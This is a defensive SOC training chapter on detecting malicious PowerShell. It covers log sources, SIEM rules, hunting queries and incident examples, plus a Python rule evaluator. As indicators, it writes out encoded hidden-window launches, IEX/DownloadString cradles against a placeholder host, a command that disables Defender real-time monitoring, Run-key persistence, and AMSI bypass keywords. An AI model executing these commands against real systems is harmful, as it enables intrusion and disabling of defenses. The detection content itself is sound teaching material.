Suspicious PowerShell activity is one of the most important SOC use cases because attackers frequently use PowerShell for initial access, payload execution, lateral movement, credential theft, and fileless malware delivery.
This chapter explains every pattern analysts must detect, every log source to monitor, and practical SIEM detection logic used in real SOC environments.
PowerShell is extremely powerful, deeply integrated into Windows, and easily abused.
Most malware infections and post-exploitation stages produce clear traces in PowerShell logs, Sysmon telemetry, and EDR behavior.
A SOC analyst must be able to tell normal usage from malicious usage quickly.
Why Attackers Use PowerShell
PowerShell is abused because it:
- Runs natively on Windows
- Supports execution of remote scripts
- Can run fully in-memory (fileless)
- Can download files via Invoke-WebRequest
- Can execute Base64-encoded payloads
- Can bypass logging if misconfigured
- Can load .NET assemblies dynamically
- Can access credentials, registry, processes, WMI
Attackers use PowerShell for:
- Malware download & execution
- Payload staging
- Lateral movement
- C2 beacons
- Data exfiltration
- Reconnaissance
- Persistence creation
Suspicious PowerShell detection is mandatory in every SIEM and EDR.
Log Sources Required for Detection
SOC detection relies on multiple logs.
Windows PowerShell Logs
Located under:
Microsoft-Windows-PowerShell/Operational
Includes:
- Script execution
- Module loading
- Pipeline commands
- Event ID 4104 (script block logging)
Windows Event Logs (Security)
- Event ID 4688 (process creation)
Shows PowerShell execution and, when command-line auditing is enabled in the audit policy, its command-line arguments.
Sysmon Logs
- Event ID 1 (process creation)
- Event ID 3 (network connections)
- Event ID 11 (file creation)
EDR Telemetry
Provides:
- Command-line visibility
- Network activity
- In-memory execution
Combined, these sources give full visibility.
Indicators of Suspicious PowerShell
Encoded Commands
Attackers hide commands using Base64 encoding.
Example:
powershell.exe -enc JAB3AHM...
Suspicious because normal users rarely execute encoded PowerShell.
Hidden, Non-Interactive Execution
Flags attackers often use:
- -nop (no profile)
- -w hidden (hidden window)
- -noni (non-interactive)
- -nol (no logo)
Example:
powershell.exe -nop -w hidden -enc <base64>
Download & Execute Behavior
Patterns:
Invoke-WebRequest
Invoke-Expression
Invoke-Command
(New-Object Net.WebClient).DownloadString(...)
(New-Object Net.WebClient).DownloadFile(...)
Payload download is a strong indicator.
Suspicious Parent Process
Dangerous parent → child PowerShell execution:
- WINWORD.exe → powershell.exe
- excel.exe → powershell.exe
- outlook.exe → powershell.exe
- chrome.exe → powershell.exe
This chain often indicates a phishing infection.
Living-Off-The-Land Abuse (LOLbins)
Attackers use PowerShell to execute:
- rundll32
- regsvr32
- mshta
- wscript/cscript
Example:
powershell.exe → rundll32.exe maliciousfile.dll
Fileless Malware Execution
Common patterns:
- Reflective DLL loading
- In-memory payload
- No dropped files
Indicators:
IEX(IWR('http://malicious/...'))
PowerShell Reconnaissance Activity
Common attacker recon commands:
Get-NetUser
Get-ADComputer
Get-Process
Get-Service
If run on systems that are not used for administration, these commands are suspicious.
PowerShell Persistence
Attackers use PowerShell to create persistence (and to disable the defenses that would remove it):
Set-MpPreference -DisableRealtimeMonitoring $true
schtasks.exe /create ...
New-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run
PowerShell C2 Beaconing
Patterns include:
- Repeated HTTP requests
- Random sleep intervals
- Encrypted payloads
- Connection to strange IPs or domains
EDR or Sysmon will show outbound traffic from PowerShell.
Practical SIEM Detection Logic
Rule 1 — Encoded PowerShell Execution
Detect Base64 encoded commands:
CommandLine contains "-enc"
CommandLine matches "[A-Za-z0-9+/]{100,}"
Rule 2 — PowerShell From Office Applications
ParentImage endswith "WINWORD.exe" OR endswith "EXCEL.exe"
Image endswith "powershell.exe"
This is a high-fidelity detection.
Rule 3 — Suspicious Download Commands
CommandLine contains "Invoke-WebRequest"
OR CommandLine contains "DownloadString"
OR CommandLine contains "DownloadFile"
Rule 4 — Hidden Execution
CommandLine contains "-w hidden"
OR CommandLine contains "-WindowStyle Hidden"
Rule 5 — PowerShell Creating EXE Files
Sysmon ID 11:
TargetFilename endswith ".exe"
AND Image endswith "powershell.exe"
Legitimate users rarely use PowerShell to drop executables, so this is a strong signal.
Rule 6 — PowerShell Network Connections
Sysmon ID 3:
Image endswith "powershell.exe"
AND DestinationIp not in internal ranges
Indicates C2 traffic.
Rule 7 — AMSI Bypass Attempts
Strings to detect:
- FromBase64String
- AmsiUtils
- AmsiScanBuffer
- bypass
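Added example, not from the original chapter: the seven rules above expressed as a small Python rule evaluator over constructed Sysmon-style events. Field names follow Sysmon; the rule names, the sample events, the Base64 filler and the internal-range list are assumptions made for this demonstration.

```python
import ipaddress
import re

# Constants from the chapter's seven rules; RFC 1918 and loopback count as "internal".
OFFICE_APPS = ("winword.exe", "excel.exe", "outlook.exe")
DOWNLOAD_STRINGS = ("invoke-webrequest", "downloadstring", "downloadfile")
AMSI_STRINGS = ("frombase64string", "amsiutils", "amsiscanbuffer")
B64_RUN = re.compile(r"[A-Za-z0-9+/]{100,}")
INTERNAL = [ipaddress.ip_network(n) for n in
            ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]

def _ends(value, suffix): return (value or "").lower().endswith(suffix)

def is_internal(ip): return any(ipaddress.ip_address(ip) in net for net in INTERNAL)

def evaluate(event):
    """Apply Rules 1-7 to one Sysmon-style event; return the names of the rules that fire."""
    if not _ends(event.get("Image"), "powershell.exe"):
        return []
    eid, low, hits = event.get("EventID"), (event.get("CommandLine") or "").lower(), []
    if eid == 1:
        if "-enc" in low and B64_RUN.search(low):  # Rule 1, both conditions as written
            hits.append("R1_encoded")
        if any(_ends(event.get("ParentImage"), app) for app in OFFICE_APPS):
            hits.append("R2_office_parent")
        if any(s in low for s in DOWNLOAD_STRINGS):
            hits.append("R3_download")
        if "-w hidden" in low or "-windowstyle hidden" in low:
            hits.append("R4_hidden")
        # Tuning: a bare "bypass" also matches -ExecutionPolicy Bypass on benign
        # scripts, so it only counts when "amsi" appears in the same command line.
        if any(s in low for s in AMSI_STRINGS) or ("bypass" in low and "amsi" in low):
            hits.append("R7_amsi_tamper")
    elif eid == 11 and _ends(event.get("TargetFilename"), ".exe"):
        hits.append("R5_exe_drop")
    elif eid == 3 and not is_internal(event["DestinationIp"]):
        hits.append("R6_external_connection")
    return hits

# Constructed sample events (not real telemetry); 203.0.113.10 is a documentation address.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": PS, "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": "powershell.exe -nop -w hidden -enc " + "QUFB" * 40},
    {"EventID": 3, "Image": PS, "DestinationIp": "203.0.113.10"},
    {"EventID": 11, "Image": PS, "TargetFilename": r"C:\Users\Public\update.exe"},
    {"EventID": 1, "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"},
]
```

Running `evaluate` over exported Sysmon events and grouping hits by host and parent process gives the same picture as the hunting queries that follow.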
Threat Hunting Queries
Hunt for Common Malicious Patterns
powershell AND (enc OR base64 OR download OR IEX OR WebClient)
Hunt for PowerShell Spawned by Suspicious Parents
ParentImage:winword.exe AND Image:powershell.exe
Hunt for C2 Behavior
Image:powershell.exe AND (DestinationPort:80 OR DestinationPort:443)
Real SOC Examples
Example 1 — Phishing → PowerShell Loader
Logs show:
WINWORD.exe → powershell.exe -enc <payload>
powershell.exe connects to 91.22.113.10
Confirms malware loader.
Example 2 — Fileless Cobalt Strike
powershell.exe → IEX → remote script
dllhost.exe injection detected
Beacon identified via memory forensics.
Example 3 — Ransomware Stage 1 Loader
PowerShell drops:
C:\Users\Public\update.exe
Then executes it.
Example 4 — Reconnaissance Commands
A user who never uses AD cmdlets suddenly runs:
Get-NetDomain
Get-ADForest
Likely internal attacker.
Intel Dump
- Suspicious PowerShell detection is critical because attackers heavily abuse PowerShell for execution, C2, recon, payload delivery, and persistence.
- Key indicators include encoded commands, hidden windows, suspicious parent processes, download commands, and abnormal network traffic.
- Logs used: PowerShell Operational logs, Windows Security logs, Sysmon Process Creation and Network logs, and EDR telemetry.
- Detection involves rule-based patterns like -enc, Invoke-WebRequest, FromBase64String, and Office apps spawning PowerShell.
- Hunting focuses on process lineage, encoded commands, outbound traffic, and abnormal execution paths.
- Process trees clearly expose phishing infections, fileless malware, and lateral movement executed via PowerShell.